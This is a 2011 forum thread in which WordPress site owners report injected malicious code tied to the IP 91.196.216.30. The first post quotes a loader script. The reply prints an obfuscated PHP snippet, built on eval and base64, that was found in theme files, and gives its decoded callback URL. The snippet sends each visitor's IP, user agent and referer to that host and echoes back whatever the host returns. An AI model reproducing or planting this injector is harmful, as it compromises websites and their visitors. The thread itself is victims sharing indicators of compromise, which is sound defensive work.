Author Topic: http://91.196.216.30/counter.php  (Read 7068 times)

0 Members and 1 Guest are viewing this topic.

September 09, 2011, 06:50:40 am
Read 7068 times

foks

  • Jr. Member

  • Offline
  • **

  • 14
On some sites I have seen a new javascript starting with <script id="googleblogcontainer">. You can see the entire script on http://sakrare.ikyon.se/log.php?id=12396.

The script is encrypted and requests the file http://91.196.216.30/counter.php. That script seems very innocent:
Code: [Select]
function remove(element) {
var parent = element.parentNode;
parent.removeChild(element);
}
var my = document.getElementById('googleblogcounter');
my.src = 'http://code.jquery.com/jquery-1.4.2.min.js?ver=3.0.1';
remove(my);
var my = document.getElementById('googleblogcontainer');
my.src = 'http://code.jquery.com/jquery-1.4.2.min.js?ver=3.0.1';
remove(my);

I have not been able to find out what the script tries to do next. 91.196.216.30 is not blacklisted in Google but is on same network as counter-wordpress.com and superpuperdomain2.com. 91.196.216.30 has also been used in the TimThumb attacks against Wordpress sites.

October 17, 2011, 06:40:09 pm
Reply #1

Mofaya

  • Newbie

  • Offline
  • *

  • 8
The wordpress hacking continue
In all my index files and wordpress theme files i have this  >:(
Code: [Select]
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip $_SERVER['REMOTE_ADDR'];$host $_SERVER['HTTP_HOST'];$uri urlencode($_SERVER['REQUEST_URI']);$ref urlencode($_SERVER['HTTP_REFERER']);$url $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref$tmp file_get_contents($url); echo $tmp?>
Decoded to
Code: [Select]
<?php $url 'hxxp://91.196.216.30/bt.php'?>
Just google 'hxxp://91.196.216.30/bt.php' and see the infected site results  :-[